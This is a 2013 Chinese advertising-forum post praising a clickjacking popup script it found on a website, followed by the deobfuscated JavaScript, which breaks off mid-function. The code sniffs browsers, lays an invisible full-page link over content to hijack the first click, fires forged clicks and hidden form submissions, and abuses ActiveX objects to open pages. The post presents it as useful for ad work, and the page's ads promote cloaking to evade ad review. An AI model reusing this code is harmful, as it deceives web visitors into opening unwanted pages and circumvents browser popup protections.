AdvertCN - 广告中国

 找回密码
 立即注册

QQ登录

只需一步,快速开始

PropellerAds
Google-Bing-Mediago-Criteo开户
⚡️按条S5代理⚡️静态⚡️独享⚡️5G广告专用虚拟卡/U充值/高返点皇家代理IP⚡️#1性价比⚡️
Mediabuy⚡️玩家开户首选【鲁班跨境通-自助充值转账】FB/GG/TT❤️官方免费开户Affiliate 全媒体流量资源⚡️
Taboola/Outbrain /Bing⚡️一级代理开户投流-7*24h❤️人工在线【官方】❤️搜索套利买量投流开户独立站⚡️开户投放
⚡️AdsPower:安全不封号,高效自动化Google FB TK游戏代投⚡️E.PN 虚拟卡⚡️BINOM TRACKER 60% OFF!
比Adplexity还好用的Spy工具ADPLEXITY + ADVERTCN7200W全球动态不重复住宅IP代理虚拟信用卡+独立站收款
全球虚拟卡, 支持U充值各种主页、账单户、BM户(优势)⚡️TikTok企业户,bm户,账单户IPCola原生住宅IP⚡️$1.8/条双ISP
FB海外户、GG老户、TK加白老户PTM虚拟卡[全新卡BIN+高返点]FB虚拟卡⚡️消费越多返现越多最大欧洲Nutra网盟BA找量
高品质·稳定高速纯净IP FB个号1块一个TikTok2审户/老户/国内外端口/加白SX.ORG 高质量代理⚡235+ 地区
GG,FB,TK, 欧美源头, 欢迎合作❤️跨境债务催收/风险代理高权重Google老户[卖户+筛户等级] 海外斗篷・智能广告过审率高达 99%
DataImpulse⚡️纯净住宅代理仅 $1FB企业户海外户,授信户,TK加白户广告位出租8500万高质量住宅IP,助力各种需求
虚拟卡返佣1%,国内持牌机构   
查看: 17705|回复: 17

[FACEBOOK] 国内也有牛人啊。很有用的。

[复制链接]

126

主题

62

广告币

394

积分

初级会员

Rank: 2

积分
394

社区QQ达人

发表于 2013-12-17 15:03:03 | 显示全部楼层 |阅读模式
天星网ClickJacking点击劫持分析; x  Q2 ?9 y( m( C
http://www.21tx.com/ 天星网 5 l, B# p" U4 Y% |* W' O
我得联系联系作者 2 H$ M% T8 n# e. g" R9 M, W" M1 d
刚好打开这个站,发现第一次点击会弹窗,然后就不会,清除下COOKIE,又继续了,然后查看源代码,也没什么奇葩的。1 J- _% z& p: a
http://www.lxting.com/script/popup/v1_min.js+ }7 f3 T2 h" O- X0 F  P
$ R& S+ M1 K1 w) w+ O; z
这个是锁定到底JS脚本,
: U# G9 k  w( E解密后的代码
  1. (function() {
    ! C! C; `( S3 h# V
  2.     var aa_url = window.ytpp_url;
    ' M( C: _, N( E1 y; S' A) f- y( Z
  3.     var ua = navigator.userAgent; + e  o% N% d* c
  4.     var form_div = document.createElement('div'); 1 ~5 A% @3 I: R8 O5 F! x
  5.     var form_pd = 0;
    2 W: H2 S7 _: R& t& n
  6.     var browser = {
    3 b2 L. y6 T/ O: e5 n/ I
  7.         ie: /msie/i.test(ua),
    ; C% X" @, g  L. I, o6 u
  8.         ie6: /msie 6/i.test(ua), + p0 X1 k( T' x+ m! Q, @8 m
  9.         ie7: /msie 7/i.test(ua),
    ; ^; G( v" V9 z/ w: Y' x5 O
  10.         ie8: /msie 8/i.test(ua), 8 v; k; M* V/ E2 j6 n( X
  11.         ie9: /msie 9/i.test(ua),
    0 a4 g; r6 U2 h, B3 S/ Q
  12.         360 : /360se/i.test(ua), . q& v' k( H5 |: Q4 O1 d; U: p
  13.         sogou: /;?se.+?MetaSr/i.test(ua), 0 B+ x, |  f: O+ w* }
  14.         maxthon: /Maxthon/i.test(ua),
    " E; w" @9 a$ R2 F# t/ a" \) t
  15.         tt: /TencentTraveler/i.test(ua), $ R3 T5 `; H: @2 R  ^
  16.         ff: /firefox/i.test(ua),
    9 o& ]: \0 {! K3 @; K* R1 {8 Q
  17.         webkit: /AppleWebKit/i.test(ua), ) I% r8 s5 v2 E/ L! h
  18.         opera: /Opera/i.test(ua),
    ) t2 R" S" W! P9 m) V9 ~- x
  19.         qqbrowser: /QQBrowser/i.test(ua), 3 z1 P7 ^* j% @7 z+ l! ^  p
  20.         cr: /chrome/i.test(ua), & R- G! Y6 A# T/ ~; N6 K- y. F
  21.         gg: window.chrome, 5 I8 S3 o  p, B% Z/ ^! W
  22.         theworld: /Theworld/i.test(ua) + H- S" z# {0 a7 d) A
  23.     };
    ) ~0 Y) i6 E/ t2 l, G
  24.     var _setting = ""; ; W  c  w; |/ e3 D* e# h' x- V
  25.     var _ct = 0;
    1 Z2 S( H9 l5 E5 u8 D4 L/ \
  26.     var _le = 0;
    3 m% d' S& u! T
  27.     var _pd = 1;
    " g1 K- b- Y# L/ v. n5 Z
  28.     var _pd2 = 0;   x3 E8 M4 G$ D7 A4 z2 b
  29.     var _pc = 1; * F6 R. G+ f4 Z( e' u  F
  30.     var _pc2 = 1; . D/ a) m6 J' ]+ l
  31.     var _pco = 0; / v- A  L& i; j
  32.     var _pta = 0;
    : G6 _0 E  k7 j, J, D3 x8 A3 k" p
  33.     var _ptb = 0; " D- L3 p& v8 F$ \  F
  34.     var _pt2a = 0;
    : A/ ?7 a+ y) Z6 U' m
  35.     var _pt2b = 0;
    # y4 @- t% ?) V" y6 I
  36.     var _pt3a = 0; : e2 B+ B/ _) n( j; E% ?
  37.     var _pt3b = 0;
    : _1 J) n! P" q7 \! c( E
  38.     var _pt4a = 0; 1 X. H8 r0 l# u) g3 O8 Q3 N& g
  39.     var _pt4b = 0;
    ' w: j# V9 w8 z
  40.     var _pt5a = 0; 1 I, D9 d, y# g9 X
  41.     var _pt5b = 0;
    0 @. {& E8 l1 [) N4 S' a3 @+ }
  42.     var _pt6a = 0;
    : F+ G! E4 u4 N; @( |* R2 y
  43.     var _pt6b = 0; 3 T+ T% F7 B7 X) }0 O
  44.     var _pt7a = 0; 5 w+ T* H6 Q' O" V- S# h
  45.     var _pt7b = 0;
    ! D( Y1 k$ h7 A4 {, V7 w
  46.     var _pt8a = 0; 2 O/ _- }$ ~1 P2 C3 H* ]
  47.     var _pt8b = 0;
    / L& E2 C$ x* i7 n% w1 e
  48.     var _pt9a = 0; , u, {4 J" ^  I4 b$ i" H9 j
  49.     var _pt9b = 0; + B  [" |, [2 J2 U. j- m. q4 x
  50.     var _pt10a = 0; 0 U. x4 k. S* b0 |9 s( b$ b
  51.     var _pt10b = 0;
    - _* j/ o. J" W8 x
  52.     var _po = 0;
    ' O' |, ]$ i8 x
  53.     var _poo = 0;
    1 i( y/ n9 @- E$ w# F+ V& ]6 G' P
  54.     var ckn, ckt; 7 Q1 ~% B! W4 i. r; v: N, e
  55.     var ads = 0; / j; S1 y+ ]% N5 D! U! u
  56.     function b(w) { + _: {9 i" [% t( x7 |2 G9 V8 P
  57.         var s = w + "=";
    + R) v+ L, v  f
  58.         var r = "";
    8 Y% t2 Z3 b# \% t( ~, V
  59.         var o = 0; 9 k- V6 _2 J  @' a  L! r
  60.         var d = 0;
    # E0 |7 t$ v! U, v( l- l" n" e6 C
  61.         var p = document.cookie;
    3 a( b% X3 }, t
  62.         if (document.cookie.length > 0) {
      d* j; _5 {5 Q) v% U
  63.             o = document.cookie.indexOf(s);
    : P, d/ c4 }' o/ `) h
  64.             if (o != -1) {
    & U  W5 V+ M8 _: w, j' h' L* {) V5 G
  65.                 o += s.length;
    8 N+ r3 q' y% q4 j
  66.                 d = document.cookie.indexOf(";", o); / }8 Y( \3 d: w
  67.                 if (d == -1) d = document.cookie.length;
    2 L: m* ^- N1 X* V- B
  68.                 r = unescape(document.cookie.substring(o, d)) # g5 z8 l7 Y5 o- v/ I# n( a5 |6 s& Y
  69.             }
    4 B' K' T+ J6 `
  70.         }
    # Z) e' F- i' O0 O+ [
  71.         return r 0 E$ B: ~  m6 W/ I; u. p% |, h
  72.     };
    " I* w5 j3 v  w$ j
  73.     function p(w, p, v) {
    9 B1 x) U2 v5 t% R  W
  74.         var t = 30; ' Q- E$ h$ A0 j7 ^- b8 p* C! O
  75.         try { 5 W$ E) B$ l/ c
  76.             t = parseFloat(p) * 1 ) h) W+ n# t  {% @9 y; i
  77.         } catch(e) {
      D: u4 \; p* o, l/ p0 _! b; G
  78.             t = 30
      \! r# i* T$ d1 ~9 g$ E2 p
  79.         }
    " D# j# N" X! z! P0 I9 I$ }
  80.         if (isNaN(t)) t = 30; ! P& k- }, s, S/ s: Z* k
  81.         var then = new Date();
    ! h+ n* [, y1 w9 \; _$ ?' s8 E0 k
  82.         then.setTime(then.getTime() + t * 60 * 1000); + s& [$ i, i% Y! P/ q6 }6 l
  83.         document.cookie = w + '=' + v + ';expires=' + then.toGMTString() + ';path=/;'
    4 Y0 o: B  y$ V6 W
  84.     }; : L) y/ r9 g9 n, F6 l  S
  85.     function init() {
    ( y4 P5 V" j3 R; E
  86.         _setting = ytpp_sti;
    8 @. t8 d/ Y- F0 q6 I- z
  87.         if (getp(_setting, "CT")) {
    ) I$ f  d1 [1 M1 _  ^) Y
  88.             _ct = getp(_setting, "CT") 0 B! O  }7 g$ @7 f/ U! W% h
  89.         } : s1 P4 j% R' K1 G( z" p+ |* z- G
  90.         if (getp(_setting, "LE")) { % j7 W7 Z3 [( D8 ?& n8 B
  91.             _le = getp(_setting, "LE") " T! {# U( c+ i2 o2 B" z
  92.         } ( O1 e( N! s! F7 o4 F* B: V7 J
  93.         if (getp(_setting, "PD2")) { 9 {8 S5 ?) I) R# [0 Q6 e
  94.             _pd2 = getp(_setting, "PD2")
    , o$ A! E* Z$ P! }' @( ^
  95.         } ; j' r7 b" N1 Y: d$ I
  96.         if (getp(_setting, "PC2")) {
      U* O9 P7 k( K) L4 m
  97.             _pc2 = getp(_setting, "PC2") / A* K9 V$ v' P
  98.         }
    $ K# x  y2 _5 D7 x- A8 _
  99.         if (getp(_setting, "PCO")) {
    4 O) W0 E) u( g
  100.             _pco = getp(_setting, "PCO")
    6 C+ S8 t+ _, i, Q
  101.         } ; V- J6 z% K9 J' d
  102.         for (var i = 1; i <= 10; i++) { + D0 _- o0 ^% J5 y) E. `
  103.             var n = i == 1 ? "": i;
    " Y( {$ q" S( ~
  104.             if (getp(_setting, "PT" + n)) {
    ! ~: ]! [( V1 ?
  105.                 eval("var _pt" + n + " = getp(_setting, 'PT" + n + "').split(',');");
    * y( W0 c0 X+ d/ i% y. Y4 r8 x
  106.                 eval("_pt" + n + "a = _pt" + n + "[0];");
    ' W4 B9 g% X: l( o  [. r0 z% d
  107.                 eval("_pt" + n + "b = _pt" + n + "[1];")
    & E9 w0 Y% U- n- R; y4 K: v
  108.             }
    2 k7 B$ {0 ?! i5 }% |5 g
  109.         } ; E2 w6 k" f6 O5 k
  110.         if (getp(_setting, "PO")) { , c. i8 ^5 s9 F* e/ O
  111.             _po = getp(_setting, "PO") ' V1 z8 `5 r4 O( N7 O- G8 h' y/ y
  112.         }
    2 k, W& F# y; o. d
  113.         if (getp(_setting, "POO")) { # o3 k/ Z, P3 e: d: R5 d# s
  114.             _poo = getp(_setting, "POO")
    / n+ x: h6 s) H7 {' Y' Z7 h
  115.         } - p$ I8 m% G: R- v) \% b1 ~
  116.         if (_pco == 1 || _poo == 1) { 5 j% E8 M5 O  h
  117.             if (_poo == 1) { " e* N: y, p2 V! F
  118.                 _pco = 0
    # i* ^$ n/ D( X- j- |$ ?7 R  L
  119.             } else {
    " ?3 J7 C, k- `* g- j/ _0 d
  120.                 _poo = 0 1 C0 h% U+ r) O) [0 `
  121.             } & U9 Z* T. z0 W) d/ o1 K% r/ y
  122.             _pd = _pd2 = _pc = _pc2 = _po = _pta = _ptb = 0; 0 M) G3 @  x( \" ?% @- d, D
  123.             for (var i = 2; i <= 10; i++) { 9 w+ h5 F% z6 Y' E9 r
  124.                 eval("_pt" + i + "a = _pt" + i + "b = 0;") & E- g' Q# h% F3 w. B' M
  125.             }
    & b9 {$ ?" Y8 S) I; c+ V4 Q, l
  126.         } 2 Z- [% k0 q5 N
  127.     }; % ?0 N4 F: {/ Z0 ]4 b( I; o1 ~
  128.     function getp(s, p) {
    " Y) ^+ O* _4 u5 n. d, d
  129.         var i = s.indexOf(p + ":");
    9 O% i; H" }$ Y% I6 z
  130.         if (i >= 0) { / L% r1 n3 L# r8 n
  131.             return s.substr(i + p.length + 1, s.substr(i).indexOf(";") - p.length - 1)
    6 I+ w9 N; o3 B! E' P0 m
  132.         }
    & ]; X; P! ~$ H- D
  133.     }; & i# n6 i2 ^& s" X5 Q3 D+ K
  134.     function event(e, event, func, act) {
    ; |' v% B: k5 f6 o
  135.         if (browser.ie) e[act === undefined ? 'attachEvent': 'detachEvent']('on' + event, func); 3 n# O7 @9 C; i$ K
  136.         else e[act === undefined ? 'addEventListener': 'removeEventListener'](event, func, false)
    * a- p" b% V2 U$ ~8 E- Y
  137.     }
    : e4 y/ j9 e; ?  s- N4 w
  138.     function pop(url, param) { 3 n/ q& q: j7 {: `; ?/ o1 X
  139.         if (!document.body) {
    , b3 l% u! t4 q( v; o+ I" H4 M
  140.             return setTimeout(function() { 0 e& z) K& P! L, n6 C
  141.                 pop(url, param) ) i" |* a% M3 v) m
  142.             }, ; O$ R- v% N8 n" S
  143.             13) + {: s" F- }2 K! n: K- L5 Y
  144.         } 7 I2 O+ J, q& |$ m9 H1 i
  145.         try {
    4 D$ s7 P. o; n& K6 m. z8 u9 J
  146.             if (browser['cr'] && browser['gg']) { / i( l) L) R7 t' d* V
  147.                 try {
    9 a7 ~* ^2 c2 ]2 E* K9 w/ \
  148.                     hrefopen(url)
    # W4 m0 @3 J* Q3 T! |5 ]
  149.                 } catch(e) { 3 y, i4 S- F, i4 T; Y
  150.                     a_pop(url) 8 d% a; o+ `2 H& f" f
  151.                 } , g0 A3 a4 i( i3 z; G2 H
  152.             } else if (browser['webkit'] && browser['maxthon']) {
    9 ?$ W) j/ ]( L' T
  153.                 if (!func(url)) { * L7 |* @( I8 u0 C
  154.                     try {
    # z+ [4 b4 L% t: b' q
  155.                         form_pop(url);
    ( k" F3 W5 P+ M  m' n
  156.                         a_pop(url)
    8 C: x3 h) b: y% ^
  157.                     } catch(e) {}
    . Z* S; o; K: _) C
  158.                 }
    / K2 H- D. ^0 i  f8 ?0 ?# V
  159.             } else if (browser['tt']) { " v2 }1 Q+ p$ h0 Q
  160.                 try {
    5 Y# u7 b4 J# H. d' W0 }3 j% e
  161.                     object_pop(url) 2 B- h2 r4 T: W* i
  162.                 } catch(e) {
    ! G+ ~( f; X2 U, s& q; K
  163.                     a_pop(url)
    2 H  ~( D) N8 U# l9 s5 k3 a
  164.                 } 4 q3 B+ w3 u1 ~3 ~9 l
  165.             } else if (browser['sogou']) { ' h- d  O# p! j+ k6 L) T# a
  166.                 if (!func(url)) { - p; Q3 X) d5 \) c  w6 M3 N: \
  167.                     try { & f2 e5 C- h; e$ @' a5 W' k
  168.                         a_pop(url) % C3 g+ x1 `/ a& j
  169.                     } catch(e) {}
    * J; `$ Z5 l) Y" F# ]+ b5 Y
  170.                 }
    $ m: M, V1 t0 F9 E/ Z
  171.             } else if (browser['webkit'] && browser['qqbrowser']) { & D( R; S) n/ @4 l4 j1 O# r
  172.                 if (!func(url)) { " h+ r8 M& w' l. L; N) Q
  173.                     try { & D& Z5 S8 y. v& S- T
  174.                         form_pop(url) 0 E, K9 d  e4 \, V: @
  175.                     } catch(e) {
    - }: n+ h' v# U! Q8 d
  176.                         click_pop(url) 6 A) E; f" A6 V
  177.                     }
    3 v/ V, y. r+ f4 m& T4 ]
  178.                 }
    8 X8 K& k0 f* H
  179.             } else if (browser['webkit'] || browser['opera']) {
    / Y$ s, E- \- Y7 I
  180.                 try {
    . _( `! a5 R7 x$ }- e( S* R
  181.                     form_pop(url); $ W* z; s2 L' c& k$ L# @
  182.                     a_pop(url) 6 X  D5 _& k2 N" Q
  183.                 } catch(e) {} . q9 k: |) C0 J, N
  184.             } else if (browser['theworld'] && browser.ie6) {
      _  Z4 h7 @; O/ [
  185.                 if (!object_pop2(url)) { % m! s' I5 ~2 e+ @7 L) J
  186.                     a_pop(url)
    6 [1 f+ n% h8 D( F
  187.                 } & r4 ?# r6 l) Y% i
  188.             } else if (browser['theworld'] && browser.ie8) {   b/ Q/ X8 K0 C4 w4 l) f9 B: g
  189.                 if (!func(url)) { 0 }1 z: J3 B0 v; h
  190.                     try {
    0 ?0 W* C0 M3 C; t
  191.                         object_pop(url)
    & u6 l  X, E6 ?2 f- m) O
  192.                     } catch(e) { 7 W5 \7 K  v2 i* k
  193.                         click_pop(url) ! A: k+ |# i3 m5 V. T6 j' [  C
  194.                     }
    ) h: X/ A. Y% x5 }" Y) y
  195.                 }
    ( ]3 C3 h3 N$ j% M
  196.             } else if (browser.ie6) { . I& x3 U5 A# Z$ u! c
  197.                 if (!func(url)) { : `# i; m' l4 [) J( h, f' M
  198.                     object_pop2(url) 0 D! z$ U# |: v# H. U9 T" }
  199.                 } ; \+ Y) c* v. O6 ^* g
  200.             } else if (browser.ie8) {   e4 S4 `, m# ~' j, s
  201.                 if (!func(url)) { ' E  e9 T- b2 ]" p# R
  202.                     try {
    ' D0 z7 I, H" u( |( m' M  I
  203.                         object_pop(url) / c& t% v) |; S+ A
  204.                     } catch(e) {
    0 L! r8 v4 \/ @- D( Q8 O( g: R
  205.                         document.onclick = function() {
    + ?5 O( E1 ], n$ H  t5 j
  206.                             func(url);
    % ^  u7 F% A* n# p2 G
  207.                             document.onclick = null; ?, f2 n' n: ]  Q+ j8 M* S  i
  208.                         }
    ; L! p5 t' S0 L$ g) n% m% q# @
  209.                     }
    ( n! K5 ?4 a9 R+ T
  210.                 }
    2 \" W% n9 Z+ R8 F6 k8 c3 {
  211.             } else if (browser['ie']) { & W9 k$ v7 n8 U$ N5 p! I
  212.                 try {
    2 b, S/ n9 |& ]4 f
  213.                     object_pop(url)   a! G# x$ v* O7 m
  214.                 } catch(e) { 5 |! V* X5 x! g7 ^
  215.                     click_pop(url) ' F6 Z" x3 B$ T4 [+ i- ~
  216.                 } : m0 C" P7 \7 _. d1 n! Y
  217.             } else if (browser['ff']) { , t' T0 ~$ U4 I$ o) d1 a' h
  218.                 if (!func(url)) { # t, I% a. G' w( W% i
  219.                     click_pop(url)
    + q0 v! [+ C6 p6 G2 b
  220.                 }
    & p! ?; q4 T8 W9 W8 L+ R, E
  221.             } else { 0 O. G  t' ?" ~2 z$ w
  222.                 if (!func(url)) { . x' s, |$ a# A, \! F
  223.                     click_pop(url) 9 O& V3 S2 u$ |& J0 t0 `( N
  224.                 } 0 x& \% M4 x) h& A4 T4 h
  225.             } / i1 d5 F5 k- c
  226.         } catch(e) { : K6 x' Q: ]! a0 R
  227.             if (browser.ie7 || browser.ie8 || browser.ie9 || browser['qqbrowser']) {
    + I3 R4 s1 j3 y9 f6 ^
  228.                 click_pop(url) . Q7 i& g. U6 e& V8 d
  229.             } else {
    ( {& ^+ x5 b, |7 U; p  P
  230.                 a_pop(url)
    1 H, s, a& j& S; R, C2 T. r
  231.             }
    + Q( n, f  [7 F  |1 p- W5 H* N
  232.         }
    % t; g( N) D( |' n' Y+ u
  233.     }
    0 @" ]% M6 E) e+ s& _% i4 E8 u
  234.     function object_pop(url, param) {
    , C+ R( D, D0 N$ t# q
  235.         var object = document.createElement('object'); & ~* @; t! n  v  C
  236.         object.setAttribute('classid', 'CLSID:6BF52A52-394A-11D3-B153-00C04F79FAA6');
    % o) V% v5 `' `! ~. \& ]) G0 {
  237.         object.style.cssText = 'position:absolute;left:1px;top:1px;width:1px;height:1px;';
    . [8 b( g3 g) B! h# T
  238.         append(object);
    : H; O+ y, Q& G
  239.         object.launchURL(url);
    " o. r- @$ @9 S# y6 |
  240.         ads++; ; Y4 z2 o. b+ X6 Q
  241.         p(ckn, ckt, ads) / P7 k. [( g% B  ~; X
  242.     }
    1 k4 L4 v4 [" k5 K
  243.     function object_pop2(url, param) { 1 F8 c/ ~4 O# u' v: X# e  Y
  244.         var object2 = document.createElement('object'); ' _# \& R" r7 u
  245.         object2.setAttribute('classid', 'clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A'); # u1 |/ o! B: J2 r
  246.         object2.style.cssText = 'position:absolute;left:1px;top:1px;width:1px;height:1px;'; ) Z! _% s; F/ ]! ^
  247.         append(object2);
    . ^7 z7 e! e4 ~8 p
  248.         for (var i in object2) { 1 N0 |' n/ n3 T' D$ Y  g8 D. K4 o4 Q
  249.             try { (function(o) {})(object2[i])
    ' d' S3 T; A) a. N
  250.             } catch(e) {} . W1 z0 V  n/ @  y: o; m
  251.         } 6 ^5 m1 |. S* n; G  H
  252.         setTimeout(function() { + M3 w" |% D6 ^; o& x
  253.             object2.DOM.Script.open(url, '_blank', '') ! [* V! M+ h$ L4 S
  254.         },
    2 y6 f/ N  O: T$ E8 o. m+ d
  255.         500);
    & W5 h0 W# p9 ^( I
  256.         ads++;
    1 d; g/ w. ]" ~& I. g: Q/ X
  257.         p(ckn, ckt, ads)
    9 F6 Y- b' _% u7 I8 N7 ]
  258.     }
    6 V- h2 Y3 ?2 `& e% H8 u. J) W. ?
  259.     function append(e) {
    * ~- Q4 f  I4 _
  260.         for (var t in {
    6 T1 z1 V' K& m1 {9 r
  261.             body: 1
    + m2 H& x8 Y, \1 I/ ~' ]- v+ S
  262.         }) {
    6 |/ R6 A: F9 u# J
  263.             var ele = document.getElementsByTagName(t); & \  O! r6 Y( l6 r# ~1 A2 @& \( q
  264.             for (var i = 0; i < ele.length; i++) {
    * R- B; k3 _8 H; S! T. B
  265.                 ele[i].insertBefore(e, ele[i].firstChild);
    1 u5 y! }  I" q" c# f
  266.                 return
    ! l) d5 f; [" g: i% c
  267.             } % R6 ^; X% q8 n; I, s2 }# |, A' }( G
  268.         } , t/ X! y* Y/ H1 M- ~- A2 {: W. F3 G
  269.     } % v* V! v* z8 h2 e
  270.     function hrefopen(url) {
    ' l& c6 X( c8 R! A
  271.         try { % K; F; i9 U; E$ Y+ w) l
  272.             var c = document.createElement("a");
    ) N# P) A) c$ c0 ^! l9 |: b: G
  273.             c.setAttribute("href", url);
    ) U) m0 `  @9 l" p. C9 E+ @
  274.             c.setAttribute("target", "_blank");
    ( _) h+ [& N' o( \
  275.             c.setAttribute("style", "display:none;");
    * n) q5 X! x. p" B! g
  276.             var b = document.createEvent("MouseEvents");
    ( K  {& q  a' I$ N
  277.             b.initMouseEvent("click", false, false, window, 0, 0, 0, 0, 0, true, false, false, false, 0, null);
    ( c+ H3 L% W" T5 j# g0 w( t
  278.             c.dispatchEvent(b); , [) }8 P1 }" t9 z- Y
  279.             ads++;
    # S0 B; W8 O4 V$ k7 ]
  280.             p(ckn, ckt, ads);
    / C: R& o1 h- |- r+ v+ P
  281.             return true
    " l$ l( j( N, k" L9 H
  282.         } catch(q) { 0 Y4 ^+ c% [2 f& X
  283.             return false
    * L3 f2 w" m5 c) C- o: @6 ~: y6 p3 t
  284.         }
    % }. |! h: O& r0 L& H3 p4 B
  285.     }
    . \* S9 \/ b6 z  h' `
  286.     function form_pop(url) {
    . q$ o2 |7 S$ j. r$ _7 S7 _
  287.         form_div.setAttribute('id', '__unionsky_push_d_object_box__'); ) Q- U" e2 C5 o# |, G- Z
  288.         form_div.setAttribute('style', 'display:none'); ; w) i6 O) R7 s" v; k) D
  289.         var form = document.createElement('form'); 4 a) k. e* x3 G
  290.         form.setAttribute('action', aa_url);
    7 a- j0 L& y; W6 y# a" p
  291.         form.setAttribute('method', 'post');
    9 R2 e* T" x, y) |: K4 }( {* U7 {
  292.         form.setAttribute('name', '__unionsky_push_d_form_box__');
    : u( L/ d3 c5 ^
  293.         form.setAttribute('target', '_blank'); 8 e" O( k% X3 o: N7 Z7 [
  294.         form.setAttribute('style', 'display:none');
    ' l6 G; t1 k1 s
  295.         var sinput = document.createElement('input');
    2 K4 ?) h. n" ^' x
  296.         sinput.setAttribute('style', 'display:none');   K( t. j- y0 a* S8 `
  297.         sinput.setAttribute('type', 'submit');
    " r3 K. [% ~& U: }$ _8 o
  298.         sinput.setAttribute('id', '_sumit_2app');
    5 e& U% ^& P1 U6 O* W
  299.         form.appendChild(sinput);
    # S* V" z: p/ M
  300.         form_div.appendChild(form);
    7 C( I9 V6 [+ O  \5 E# W0 {- d
  301.         append(form_div);   Z& X1 J& c8 m" v( U
  302.         var unionsky_from = document.forms["__unionsky_push_d_form_box__"]; : X- ^$ e8 Y, t( G5 ]$ O
  303.         try { 6 L$ c  \, y# O+ E) S! w
  304.             document.getElementById("_sumit_2app").click()
    ) u3 n! e' w- {2 Q) `+ N( _; l
  305.         } catch(e) {
    ; U2 B8 c2 M& N
  306.             event(document, 'keyup',
    5 [2 H  g& E+ E  W/ _6 q
  307.             function(e) { & ?3 h  c. e) G
  308.                 if (document.getElementById('__unionsky_push_d_object_box__') == null) {
    3 Z: M9 x' {# m* h  F( B5 M
  309.                     return
    ' ]4 p5 A2 r. h) d* ^9 Z
  310.                 }; % n/ |6 Y" `1 \
  311.                 e = e || window.event;
      v5 j6 E3 B1 J' `3 K2 K
  312.                 e.canceBubble = true; 3 q# e! k* s9 P8 E, E1 d
  313.                 event(document, 'keyup', arguments.callee, true);   M. ]3 G. l* Y" f# x
  314.                 form_pd = 1; " j# Z, y3 W/ e% E
  315.                 unionsky_from.submit()
    / J, T. X5 ~' a& I% \4 b, H4 j. y; ~
  316.             })
    " B4 _1 Q% ?2 x& A" w2 X
  317.         } ) B8 G' k3 V$ L1 f5 V1 j
  318.     };
    & d* R8 u8 X, n4 u& f( e
  319.     function click_pop(url, param) {
    2 c- ~/ |$ ~2 L3 M: `) K
  320.         event(document, 'mouseup',
    - k( C% u+ W2 R0 q* T# M/ T7 t
  321.         function(e) {
    ) M& Y0 M: s2 a: r& X! m% F% G
  322.             e = e || window.event; 3 N5 q4 k( h5 f1 [9 q4 M
  323.             e.canceBubble = true; - Q. A- G( B& B  }7 E6 `
  324.             event(document, 'mouseup', arguments.callee, true); . Q3 B8 y$ Y. B" G8 m  `4 C: ~
  325.             func(url, param); 2 c/ u" M- L9 B! n! ^$ y
  326.             ads++; 2 S  g, _) g/ n% o) v6 p0 m6 @( O9 d0 D
  327.             p(ckn, ckt, ads) 1 F- I  `6 v8 h  p' J1 `4 f
  328.         })
      J8 S" l8 M- w9 o
  329.     };
    $ r* h  f3 W6 L
  330.     function a_pop(url) {
    - Q3 {5 d! }  c" F% g8 V
  331.         if (ytpp_plid == 166028) { ! C& M' b. s' O* E- h
  332.             return  l7 V" A! [' z4 _# D+ o
  333.         } 6 J2 m. Z) |, E" P1 V. m& y
  334.         if (!document.body) {
    : X* \  o3 w! E
  335.             return setTimeout(function() { - @/ ~; {- {" ?% p  T7 W
  336.                 a_pop(url) , z* x6 b2 ?- H; Q% x1 [  Z* @
  337.             },
    ) W% [& p. F+ e% C8 ~% b0 t
  338.             13) $ N1 ]# n7 p, U! h  V. H
  339.         } $ h/ a! j1 \' ?9 L0 \
  340.         var a = document.createElement("a");
    7 s9 t+ f8 p. g# l
  341.         a.href = url;
    : {7 O, c: r1 C! g% H+ V& H
  342.         a.target = "_blank"; " ~* E$ L+ Z- W% e
  343.         var div = document.createElement('div');
    0 r" d0 n  l) |: d, w  o3 U2 D
  344.         div.style.backgroundColor = '#fff';
    " t  E" S+ U* ]
  345.         a.appendChild(div);
    . ?0 I# q4 u6 I3 e: Y1 ?4 A
  346.         append(a); 7 v; b8 q! b9 C4 p' V" C$ @) W
  347.         var as = a.style; # _1 p9 i8 i+ s2 P* E& Z
  348.         as.position = "absolute";
    / K- k6 E3 H( q0 Q  C% H. I2 o/ g
  349.         as.zIndex = '2147483647';
    - W5 }/ s" U0 L% _; q# O8 P
  350.         as.display = "block"; 5 {/ x( e- \) y
  351.         as.top = "0px";
    ! O. o; P4 e' u* J8 V
  352.         as.left = "0px"; 2 \' o# D& T  m
  353.         as.cursor = 'default';
    1 q! e2 d; }. T1 B! W; }# `4 o' C
  354.         as.opacity = "0"; + Z4 U. ^  W4 k4 M2 Y* w- p
  355.         as.filter = "alpha(opacity:0)";
    " y1 f; u5 u! Y( ^3 t7 M
  356.         var m = setInterval(function() {
    ' s! d, M& o% t5 V* `
  357.             if (form_pd == 1) {
    3 T% @$ b( O4 B3 p
  358.                 a.parentNode.removeChild(a); ( M, k' @6 C( ]9 j
  359.                 clearInterval(m);
    4 I. @9 W* P0 Y8 J) k- m4 M
  360.                 return
    ) d( {- z' L4 x, P8 b* S# [
  361.             } 8 z" F' q! B# B, o! n
  362.             a.style.zIndex = '2147483647';
    % ]: p, N9 n+ A# q+ h
  363.             var d = (document.compatMode.toLowerCase() == 'css1compat') ? document.documentElement: document.body; & V  H8 x4 y4 g: ^; w
  364.             a.style.top = Math.max(document.documentElement.scrollTop, document.body.scrollTop) + 'px'; " i6 {8 }$ ~. p* p1 ?8 X
  365.             div.style.width = Math.min(d.clientWidth, d.scrollWidth) + 'px';
    : F7 r. h) f( T) I5 r
  366.             div.style.height = d.clientHeight + 'px';   h  t2 X/ ]' e+ G
  367.             if (browser['ie']) {
    % S5 k+ V  `2 [$ N. S
  368.                 try {
    0 J7 {  o. U& L- Z0 |
  369.                     var divs = document.body.childNodes; . c. m) B( Y8 l  i# L- L
  370.                     for (var i = 0; i < divs.length; i++) { 9 Z' O. o5 k  p1 a
  371.                         if (!divs[i]['style']) {
    . H# X6 U4 a/ d: x: @! o% {) B
  372.                             continue4 ^& u0 |& k! q: i4 [" t
  373.                         }
    6 V9 t9 N7 f( b# F) z; D7 }, z
  374.                         var _i = parseInt(divs[i].style.zIndex);   {( O+ M7 }3 n4 F
  375.                         if (_i && divs[i] != a && _i == 2147483647) { / r/ e9 t+ H  ?. ~5 q
  376.                             divs[i].style.zIndex = _i - 1
    9 q' S% R$ Q+ d, p
  377.                         }
    . L9 }0 |7 t9 z; z" D
  378.                     }
    # C5 F8 L4 R: }- G& Y
  379.                     a.style.zIndex = '2147483647'
    8 L# |/ B1 Q' T% i- x/ n7 f' o' g7 Y
